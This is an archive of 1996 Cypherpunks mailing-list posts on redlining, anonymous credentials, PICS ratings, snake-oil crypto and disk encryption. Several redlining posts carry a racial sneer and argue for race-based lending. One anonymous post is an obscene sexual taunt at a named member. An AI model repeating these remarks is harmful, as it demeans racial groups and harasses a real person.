lenders do in establishing loan criteria.

Nothing new here.

What is lost on many people who denounce "racism" and demand that banks
give equal percentages of banks to various allegedly aggrieved "oppressed
minorities," based on various quotas, is that the loan process is almost
totally driven by _greed_, as it should be. Any bank which practices
"stupid racism," e.g, by ignoring good payback prospects because of
tangential or unimportant criteria, faces lost business.

That the composite effect of lending criteria studies is that relatively
few inner city blacks who failed to graduate from high school and who have
menial jobs are offered credit is not a function of racism, but of these
correlation studies.

Sometimes other criteria can become domiant, such as "loss of face" in
Asian cultures if a loan is defaulted upon, especially a loan made by other
members of one's ethnic community. This explains the success of the private
lending pools many Asian communities have.

Blacks who feel "discriminated against" would do well to emulate this
example, instead of demanding that Massah in the Big House fix things for
them by government distortion.

(Note that one way commercial banks have of avoiding the problem of quotas
on loan applications is to simply not have offices in inner cities or other
areas of poor credit prospects. This has been one of the main effects of
government distortions of free markets in credit.)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 12:10:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
In-Reply-To: <01ICVRTK0606AEL6R8@mbcl.rutgers.edu>
Message-ID: <v03007803aed4c54f9c32@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:43 PM -0600 12/11/96, Igor Chudov @ home wrote:
>
>The problem is, people can choose what credit history they want to have
>(I can be a saver or a spender, for example), but nobody can change the
>color of their skin.
>
>This is central point of the theory why discrimination based on credit
>histories is OK, while the discrimination based on race is not.

But of course one also cannot change one's gender, age (except by waiting),
or national origin, marital status (at least not easily), etc. and yet
these often offer correlation data on expectation of payback.

(If they do, they do. If they don't, they don't. My point is not to argue
for these factors, or how a lender might want to weight them, only to note
that many such criteria are in fact not changeable by the applicant for
credit (or insurance, or a rental, etc.).)

Personally, of course, I reject the notion that lenders of money or renters
of property should be told by men from the government that they may not
take into the gender, ethnicity, age, marital status, etc. of applicants.

The knee-jerk demonization of "racism" and "discrimination" in this society
needs reexamination. No, I'm not arguing _in favor_ of simplistic notions
that the color of one's skin is critical. Rather, it's clearly important
for _some_ decisions, as we all know whether we admit it or not.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 11 Dec 1996 12:37:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Silly me ...
Message-ID: <199612112036.MAA05582@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


About 2 years ago, I attended CFP in San Francisco (really San Mateo,
but who's counting), and I ran across a presentation by an ex-Justice
Department dude named Kent Walker presenting the government's side of
the encryption/wiretap debate.

He really seemed nice enough, and I tried to chat with him.  My topic
was how could a good meaning hacker help good meaning government dudes
figure out details to policies so that everyone is happy.

Little did I know at that time that this is the same Walker that was
quoted by Meeks as saying cute lil' gems like ...

    "If you ask the public, 'Is privacy more important than catching
     criminals?' They'll tell you, 'No.'"

... and ...

    "It's easy to get caught up in the rhetoric that privacy is the
     end all be all."

After a little bit of frustration, I wrote him off as someone cashing
in on his Justice days to be some VP of government relations (a.k.a.
lobbyist) with Air Touch.

Perhaps there is something slightly more spooky with this character
than I originally thought.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 12:32:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Credentials without Identity--Race Bits
Message-ID: <v03007804aed4c9238269@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



By the way, on this oftentimes off-topic issue of "bigotry" and "racism,"
here's a zinger some of you may not have thought much about. And it's
certainly related to the themes of Chaumian "credentials without identity,"
which is very much on-topic.

While it has been claimed by some that "crypto anarchy" means that race
won't matter, that cyberspace interactions will be color-blind, this is
misleading.

While many--probably most--users will care only for cyberspace personna
issues, and not meatspace personna issues of race, color, height, weight,
etc., this is not something built in to anonymous transactions.

Consider a "race credential" offered by some entity. Perhaps one goes down
to the local Aryan Nations office and gets one's genetic heritage stamped,
or down to the Kwanzaa Youth Center to be similarly stamped....

(Why some groups might want this is left as an exercise for the reader.
Perhaps a less-inflammatory example (to some of the sensitive amongst you)
might be that some women want to interact in "women only" forums--a clear
case of discrimination, no?--and may want a "gender bit" avaiable to
display as a credential.)

But, you may ask (if you are new here or haven't been following the work of
Chaum and others), won't display of such a race or gender bit compromise
one's identity or be easily forged? The simple answer is "No."

Hal Finney has written several good articles for this list about
"credentials without identity." And of course David Chaum wrote the
originals.

The canonical example is that of an "age field" in an unforgeable ID card,
granting one access to, say, a bar, without revealing identity. (This
become especially important in an age of smartcards and wide use of
cardreaders at entr points to various places...without a "credentials
without identity" system, every passage through such a portal provides too
much information to those compiling surveillance records, dossiers,
customer preference lists, etc.)

But a "race field" would allow those who wish to only communicate with
certain races to do so.

Just to set the record straight, and one reason ethnic separatist groups
are likely to become intensely interested in crypto anarchy.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 11 Dec 1996 10:48:13 -0800 (PST)
To: EALLENSMITH@ocelot.Rutgers.EDU (E. Allen Smith)
Subject: Re: Redlining
In-Reply-To: <01ICVRTK0606AEL6R8@mbcl.rutgers.edu>
Message-ID: <199612111843.MAA00290@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


E. Allen Smith wrote:
> 
> From:	IN%"mjmiski@execpc.com"  "Matthew J. Miszewski" 11-DEC-1996 03:52:03.23
> 
> >This is the essence of, at least, my disagreement with you Red.  I dont
> >agree that redlining doesnt harm people.  You see no harm.  I do.
> 
> 	Of course redlining causes harm to those who are redlined... they
> can't get credit. But the same can be said of any system of keeping
> track of who is likely to repay credit; it means that someone who has
> defaulted on past loans won't get future ones. Quite simply, while I
> would agree with you that racism certainly persists (it would be
> difficult for me to grow up in the South and not see this), I would
> argue that you have no evidence for that the basic motivation behind
> redlining is that the people in such areas are less likely to repay
> credit.
> 

The problem is, people can choose what credit history they want to have
(I can be a saver or a spender, for example), but nobody can change the
color of their skin.

This is central point of the theory why discrimination based on credit
histories is OK, while the discrimination based on race is not.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 12:39:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Utility of Snake Oil FAQ
In-Reply-To: <199612111559.KAA13478@goffette.research.megasoft.com>
Message-ID: <v03007805aed4cc72495e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:17 PM -0500 12/11/96, Jeremiah A Blatz wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>C Matthew Curtin <cmcurtin@research.megasoft.com> writes:
>> Got a bit of an update for everyone who was interested in the utility
>> of the Snake Oil FAQ. Tim May raised the issue that it seems likely
>> that a usenet FAQ will only reach people sufficiently clued to look
>> for a usenet FAQ, which probably means they're clued enough to already
>> know what's in the FAQ. I myself had this concern, but went ahead
>> taking everyone's input and working on it anyway.
>
>Good for you. I think Tim has largely overestimated the clue of the
>average FAQ-reader. I've learned quite a bit from FAQs. Besides,
>multiple distribution points for the same info are a Good Think, in
>that they increase exposure, and use different language to express the
>same things, thus allowing greater comprehension.

Careful. I didn't say precisely what Matthew said I said. My comment, from
some months ago, was, as I recall, that the people _most in need_ of
reading such a FAQ would probably be unreached by it. By "most in need" I
also meant the _developers_ of snake oil systems.

As a recent example, I rather doubt that the developers of the "virtual
one-time pads" and "really good Caesar ciphers" have seen the FAQ. Or, if
they have, that they understood the relevance for their own products.

The best "snake oil FAQ" is reading the first few chapters of, say,
Schneier. Those who read enough of Schneier are well-prepared to see the
flaws in "virtual one time pads," while those too lazy to bother are almost
certainly not likely to learn much from a FAQ.


I think it's fine that the authors of the Snake Oil FAQ generated it. To
each their own. My approval is not needed, as the Cyperpunks group is
neither a collective nor a democracy.

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 11 Dec 1996 09:52:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Data Security in Buildings
Message-ID: <1.5.4.32.19961211174935.006b39f0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


As follow-up of the recent discussion of RF detection,
we've put a 1995 article on data security in buildings at:

     http://jya.com/datasec.htm

It describes architectural measures to protect data beyond
that provided by encryption. We offered this article by E-mail 
in 1995. Ta-da: a request came from DOJ.

It cautions that the global snooping is booming, so what 
worked in 1995 may be Moscow-Embassy Potemkin: for
security hire an ex-KGB spookitect!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 11 Dec 1996 10:03:55 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Java DES breaker?
In-Reply-To: <iuwRyD122w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961211130512.9870A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> Bill Frantz <frantz@netcom.com> writes:
> > I have a client who needs strong crypto routines in Java.  (They want
> > maintain the privacy of their customer's data when stored on the customer's
> > disk.)  They need the platform independence that Java provides.  I would
> > appreciate pointers to implementations.  (BTW - I already know about the
> > Systemics routines.)
 
> I think it would make much more sense to implement a CPU-intensive problem
> like DES in ActiveX.

Sure, if all you have on your desktop is a PC.  Some folks happen to have 
Ultra-1's on theirs, and ActiveX won't work there.  Besides, Just In Time 
compilers are doing quite well, even on PC's.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 11 Dec 1996 13:05:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Why PICS is the wrong approach
Message-ID: <v03007806aed4d0493094@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



PICS is the wrong approach becuase it oversimplifies the ratings of
content, because it places the ratings made by the author in the payload
itself, and because third-party ratings systems are cut out of the loop
(effectively).

One computerish way to think of this is that the "binding" is too early. At
the time of distribution, say, I mark my work something with some PICS
label, based upon my best understanding of the PICS labels, ratings,
agencies, and laws. But once set, the "binding" has been made. Later
reviews or reviews by other entities cannot affect the binding, at least
not for this distributed instance.

And of course it is quite likely that things important to others in their
ratings are not as important to me. I might even ignore certain points, not
even seeing the need to point out things in the work. This is inevitable,
as there is no uniform view of truth, no uniform set of values and
priorities, and no hope there ever can be such a monistic view. Consider
the recent example of AOL's lists of banned words, even words in "harmless
situations" (e.g, the example someone cited of "tits" being banned, despite
being the name of a bird...would an animal-lovers Web page or posting with
"Tits and Asses!!!" prominently in the title be PICS labelled as obscene?
Some would surely think so.).

A much better solution is to let the unique ID block of an article--the
Usenet article ID, or some hash of the headers, whatever--be a pointer that
other ratings servies could then use to provide for their customers or
clients as a filtering mechanism. This would allow as many ratings services
to exist as clients would be willing to support.

Sure, there are _time delays_ in the evaluation process, as, for example,
the Catholic Index reviews Web pages and Usenet posts, but all evaluation
causes delay. This puts the burden on those proposing to filter content.

More importantly, the "payload" does not carry some particular set of
fairly-arbitrary PICS evluations. Binding by the censors instead of by the
originator, which is as it should be.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 11 Dec 1996 11:09:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Java DES breaker?
In-Reply-To: <Pine.SUN.3.91.961211130512.9870A-100000@beast.brainlink.com>
Message-ID: <6uBsyD129w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:
> On Wed, 11 Dec 1996, Dr.Dimitri Vulis KOTM wrote:
>
> > Bill Frantz <frantz@netcom.com> writes:
> > > I have a client who needs strong crypto routines in Java.  (They want
> > > maintain the privacy of their customer's data when stored on the customer
> > > disk.)  They need the platform independence that Java provides.  I would
> > > appreciate pointers to implementations.  (BTW - I already know about the
> > > Systemics routines.)
>
> > I think it would make much more sense to implement a CPU-intensive problem
> > like DES in ActiveX.
>
> Sure, if all you have on your desktop is a PC.  Some folks happen to have
> Ultra-1's on theirs, and ActiveX won't work there.  Besides, Just In Time
> compilers are doing quite well, even on PC's.

I happen to have a Sparc 20 box and a Linux box and a SCO box, and ActiveX
won't work on any of those. I also work with a bunch of other equipment
that's much faster than a PC, but doesn't run browsers. (Most of it is not
connected to the 'net for security reasons, but that's besides the point.)

If Bill's client is sure to run the platforms that MS IE runs on, then this is
not a consideration.

Interpreted FORTH bytestream (which is what Java is) may be "doing quite well"
when drawing GUI gizmos and widgets, but it can't get anywhere near the
performance of hand-optimizer assembler that you can stick into ActiveX.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 11 Dec 1996 12:09:34 -0800 (PST)
To: drose@AZStarNet.com
Subject: Re: Redlining
Message-ID: <3.0.32.19961211140911.00695a20@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03:05 AM 12/11/96 -0700, drose@azstarnet.com wrote:
>Many people of good will find racial discrimination to be abhorrent. OTOH,
>I'm sure that as an attorney you are cognizant of the fact that financial
>institutions have a fiduciary responsibility to their shareholders.

Are you suggesting that a fiduciary responsibility is violated by *not*
redlining?  I stated before that all *real* qualifying factors remain in
force.  The only irrelevant method to be eliminated is place of residence.
Granted, if a certain bank only made loans through direct mail campaigns or
some such, an argument *might* be made that risks are higher in certain
residential neighborhoods.

Breach of fiduciary duty would be thrown out almost immediately as a claim.

>
>In any case, have you given any consideration to taking your well-meaning
>but off-topic thoughts to any one of a number of perhaps more appropriate
fora?
>

Actually, I mentioned redlining as an aside to a totally different point.
Red has asserted, and I tend to agree, that this is actually on point.  We
are discussing the possibilities of crypto anarchy.

Matt
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMq8U4bpijqL8wiT1AQG+KgP9GOTcxgKTqR+AgUf2qiRjO97kV+QdQ7Tq
6PZIjQYmgSM6YS5Yg75A8iSD2soi9ZFfEM++6TGHqCZ1ViLpNTuQZJGjxB3mUs8D
U5eYiPmUEw9NC0z0CCwIPFyxouWtL4lhG3rUEopLuUuqB1OwPkbShIddkGxYRnqt
prsuIc6m314=
=zUqA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 11 Dec 1996 14:13:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612112212.OAA08269@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 3:05 AM 12/11/1996, drose@AZStarNet.com wrote:
>Many people of good will find racial discrimination to be abhorrent.

Abhorrent?  To the extent that stupidity is repugnant, I suppose you
are right.  However, I find it interesting that we are taught to see
racism in terms of morals.  The basic tone seems to be "Oh, we really
shouldn't say such things ... even if they are true."  What you don't
hear very often is how racists miss out on friendships and valuable
life experiences.  Why not?  Because typically the people condemning
racism do not, in their hearts, believe it is worth knowing people in
certain racial groups.

Imagine a company which avoided hiring good people for dumb reasons.
Why is this any different from any other foolish decision?  Leave the
abhorring to the company's poor stockholders.  But, of course, many of
the people who are doing the abhorring are unable to picture members
of certain racial groups being great people to hire.  (My comments are
directed to the world at large and not drose@AZStarNet.com)

Rather than promoting abhorrence for racism, it would be more
constructive to discuss reality itself.  This happens infrequently.
Instead, we are encouraged to pretend reality is something other than
what we believe.  Topics of the African-American crime problem are
considered to be inappropriate, yet it is a very real component of
American urban life.

Discouragement of thought and discussion is another hallmark of a
totalitarian society.  Thought and discussion are not conducive to
blind obedience.

Ironically, most African-Americans are better equipped to discuss
their beliefs about racial groups than their "educated" "defenders".
For example, check out the "Last Poets".  You won't agree with
everything these people have to say, but there is no question that
they are speaking their minds, often brilliantly.  (I consider the
poem "Niggers Are Afraid of Revolution" to be their chef-d'oevre.)
Another example can be found in the movie "Crumb".  Much, if not all,
of Crumb's work is unpopular amongst the "politically correct", often
on the grounds that he is racially prejudiced.  Crumb reports that
African-Americans never object to his work and often give him positive
feedback.  Clearly, the people Crumb is talking to have the
sophistication to recognize his advanced use of satire and courageous
exploration of topics forbidden for discussion in American society.

(Let me add that remailers are great.  I would be reluctant to express
these ideas in any other way for professional reasons.)

African-Americans have clearly added a great deal to American culture.
The great musical achievement of the 20th century is jazz and it was
primarily developed by African-Americans.  Jazz holds its own
intellectually against any other genre of music from any time.
Interestingly, jazz did not originate in an elite, like most great
cultural achievements.  It was developed by an oppressed minority
which had only limited access to surplus resources.  Jazz was
developed in an astonishingly short time, really just a few decades.
Most "cultured" Americans would give their eye teeth to go back in
time and meet Mozart and his friends.  Yet, a short time ago people
capable of comparable achievements were available in the United
States.

Jazz has not received the recognition that it deserves in the United
States.  In Europe, jazz musicians are given something more like
the respect they have earned.  This is not to the credit of
the United States.

(Those who don't believe me should get "Love Supreme" by John Coltrane
and listen to it carefully about 20 times.  There are layers and
layers of depth and meaning.  Those who are accustomed to more
organized forms of music will initially hear a sloppy performance.
This is hard to understand because these are some of the most
technically accomplished musicians who have ever lived.  hat they are
doing is stretching medium and extending the range of meaning which
can be expressed.  Particularly fascinating is how well the apparent
sloppiness of each musician dovetails so well with what the others are
doing.  This is challenging, to say the least.  The relationship with
his God that Coltrane expresses is quite different from the one
usually hears.  Mozart, Bach, et al, have a tendency to fawn.
Coltrane expresses a more intimate (dare I say "anarchistic"?)
vision.)

The canonical jazz musician spends hours and hours of work every day
developing his technique, mostly through the love of the art, much
like many of us do with computer programming.

At any rate, those who wish to enlighten their fellows on the subject
of racism can do better than "it's just wrong."

>OTOH, I'm sure that as an attorney you are cognizant of the fact that
>financial institutions have a fiduciary responsibility to their
>shareholders.

I'm afraid this misses the points that Matt and I have been
discussing.  Matt believes that redlining betrays the fiduciary
responsibility of the banks.  I believe that it doesn't matter.  That
is, if you want to go to a bank which is riskier and pays lower
interest because it avoids good business, that is your problem.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pavel Korensky <pavelk@dator3.anet.cz>
Date: Wed, 11 Dec 1996 05:15:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Harddisk encryption ??
Message-ID: <199612111316.OAA00245@zenith.dator3.anet.cz>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

I am trying to post this message once more. It seems that my first message
somehow didn't find the way to the mail-list.

I have one problem which I would like to consult with you.
I need to protect the data on the computer harddisk against physical theft.

Current situation:

Computer with several harddisks - approx. 9 GB. On this computer, the following
OS are used: Linux, DOS, Windows NT. The data on this computer must be
accessible from all operating systems. Encryption of files must be transparent
to user and encryption algorithm must be "strong".

Because I am not able to find any disk encryption software which is able to run
on all these platforms, I decided to use the following temporary solution:

Add one more computer with Linux OS. On this computer, there will be only a
small root partition with necessary Linux components. All other disk space will
be encrypted with IDEA, using the /dev/loop. This machine will be some kind of
secure file server.
On the second machine, where the user works, there will be partitions with
operating systems, necessary utilities and the TCP/IP stack for DOS/Windows, NT
and Linux. The data and application disks will be mounted via NFS and user will
work with files from file server.
The computers will be interconnected with Fast Ethernet. This mini-network is
NOT connected to the Internet, so the NFS (in)security should not be a problem. 
Also, both computers will be placed in the same room (distance approx. 3 m), so
there should be no problem with tapping/data capturing on the Fast Ethernet
connection.

I have the following questions.

Can anybody see some major security hole in this system ?
How fast will be this system ?
Anybody has any idea if there is some more sophisticated solution for this
problem ? 
Anybody heard about some strong disk encryption which is able to rund under
Windows NT, Linux and DOS ? It seems that the Win NT are the major problem. I am
not able to find any disk encryption for NT.
Anybody is able to port Secure File System to Windows NT ? I am trying to port
this program under Linux, but I am not the NT system programmer.

Thanx for any comments, help, ideas etc.


Best regards


PavelK


--
****************************************************************************
*                    Pavel Korensky (pavelk@dator3.anet.cz)                *
*     DATOR3 Ltd., Modranska 1895/17, 143 00 Prague 4, Czech Republic      *
*  PGP key fingerprint: 00 65 5A B3 70 20 F1 54  D3 B3 E4 3E F8 A3 5E 7C   *
****************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Wed, 11 Dec 1996 11:19:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Utility of Snake Oil FAQ
In-Reply-To: <199612111559.KAA13478@goffette.research.megasoft.com>
Message-ID: <0mfkXF200YUf0BmtQ0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

C Matthew Curtin <cmcurtin@research.megasoft.com> writes:
> Got a bit of an update for everyone who was interested in the utility
> of the Snake Oil FAQ. Tim May raised the issue that it seems likely
> that a usenet FAQ will only reach people sufficiently clued to look
> for a usenet FAQ, which probably means they're clued enough to already
> know what's in the FAQ. I myself had this concern, but went ahead
> taking everyone's input and working on it anyway.

Good for you. I think Tim has largely overestimated the clue of the
average FAQ-reader. I've learned quite a bit from FAQs. Besides,
multiple distribution points for the same info are a Good Think, in
that they increase exposure, and use different language to express the
same things, thus allowing greater comprehension.

A few suggestions:
Pot the warning signs near the top. The technical intro is too brief
to be easily understandable by mosr MIS folks, and may scare them
away. I think a good organization for the document would be
1) Warning signs
2) The stuff about key sizes
3) The technical intro
4) everything else

Also, I saw no mention of source releases in the warning signs
section. Publishing your algorithm is good, but if there's a bug in
your random-number generator (Netscape?), you're screwed.

Examples of good and bad crypto. Stuffit and MSWord encryption is bad,
PGP is good, that sort of thing.

Anyway, I think it's a good resource.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMq8Izckz/YzIV3P5AQF70AL8DvPm3YRujGshMZcxlj5Liz+eZEVimOUA
zc8P/iePJo4vP+Xt76kHPGGC4BPjgyIggXeLlL0q3H1mkUXCmFZIalAHe8egvOxs
g+JrAPppn4VtDjWFbbmtOND6umioxTr9
=PzLL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Wed, 11 Dec 1996 11:33:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Harddisk encryption ??
In-Reply-To: <199612111610.KAA00971@manifold.algebra.com>
Message-ID: <0mfkjC200YUf0Bmus0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ichudov@algebra.com (Igor Chudov @ home) writes:
> i definately see a problem.
> 
> you encrypt all your data on that another computer, and then send this 
> data over your LAN in the clear. the data can be compromised by snooping
> at the network connection.

If you had read his message, you would have noted that he's on a
private network. Net sniffing should not be a problem, unless he's
under tempest attack. Of course in that case, he's probably screwd
anyway. 

> that sux, although you are protected against "physical theft". 
> 
> I suggest that you use PGP and DOS partitions to keep your files
> instead.

Nahh, however, watch out for temporary files lying around, post-its
with passwords written on them, plaintexts lying around on unencrypted
partitions, etc.

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMq8Lyckz/YzIV3P5AQGRBQMA2Y9kWMRhTo7p5NSzYM/jMgG0keHycokD
jEkOA2/MhX9G2mH9MtDuqUWMEbRXswPYRBJ41MOMGu4IIXnWMY6mbyB1tHYVGYxL
EgqJxSFAexIBewC9gOWoKCFMf53RaRJb
=pDRv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)
Date: Wed, 11 Dec 1996 11:42:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: Quadratic residues
Message-ID: <199612111941.OAA19216@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


Now is the time for all good little boys to cum in Tim May's big mouth.

           \|/
        /~~~~~~~\
       |  O   O  |
   -ooo-----U-----ooo- Tim May





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Wed, 11 Dec 1996 15:07:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Redlining
Message-ID: <199612112306.PAA19358@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:25 AM 12/11/1996, Douglas Barnes wrote an excellent article:
>Another interesting aspect -- there's been huge growth in the "making
>loans to folks with non-traditional or bad credit histories" market
>recently, as the market for folks with good credit histories has 
>become saturated. This has been done largely by various NBFIs operating
>outside of the normal "bank" structure, and specializing in certain
>kinds of consumer loans.
>
>It is vitally important to realize that to a bank, a loan is a "product,"
>that they "sell" to customers.  It is how the bank makes money. If
>the market is operating properly, irrational refusals to loan on the
>part of some institutions will create a market opportunity for other
>institutions.

This more true than ever before.  Nowadays, banks commonly find
themselves in the mortgage origination business.  Once a mortgage is
originated, it is packed up with many similar mortgages and sold off
as a CMO.  This means the bank can specialize in what it is good at,
rather than speculating in interest risk.

The CMO market is intensely competitive.  Many people spend a lot of
time looking for misperceptions of default rates and the like.
Traders are not racists when they are trading, God bless their greedy
souls.  If it is really the case that mortgages are not being
originated irrationally, there is an unbelievable opportunity.
Originating mortgages does not require a great deal of capital and the
turn around of what investment is needed should be well under a year.

>The problem with banking & financial services is that they are already
>so heavily regulated, and the barrier to entry is so high, that the
>market seldom operates properly. Thus we see _more_ regulation piled
>on (such as the CCRI) to address the problems that come about from the
>previous piling-on of regulations. 
>
>When there is little competition between banks, this creates a situation 
>which, viewed in isolation, seems "unfair" to those at the fringes of the 
>loan market. The superficial answer to this problem is to force banks
>to lend in areas that are less profitable for them than their traditional
>areas -- at this point banks almost begin to resemble monopoly public
>utilities, which, when you look at the regulations they operate under,
>is almost the case.
>
>The more enlightened answer is to back off enough on the regulation so
>that marginal loan markets become attractive business opportunities,
>and any truly irrational lending practices (e.g. based on race) lead 
>directly to losing business to a competitor.

I would add that the purpose of the regulation is generally not to the
benefit of customers, but the banking guild.  Increased legislation
and control favors people who can afford lawyers or have the political
connections to prevent the need for lawyers.  Regulation favors the
established and not the poor Albanians.

Opening a bank should be as easy as forming a corporation.  There have
been brief periods in U.S. history when this was the case.  I have
heard it worked quite well.  Curiously, preferred stock in the banks
was such a liquid market that it became treated as cash.  Instead of
making a deposit, you could buy some preferred stock.  Note that this
solves rather elegantly the problem of bank runs.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 11 Dec 1996 13:14:49 -0800 (PST)
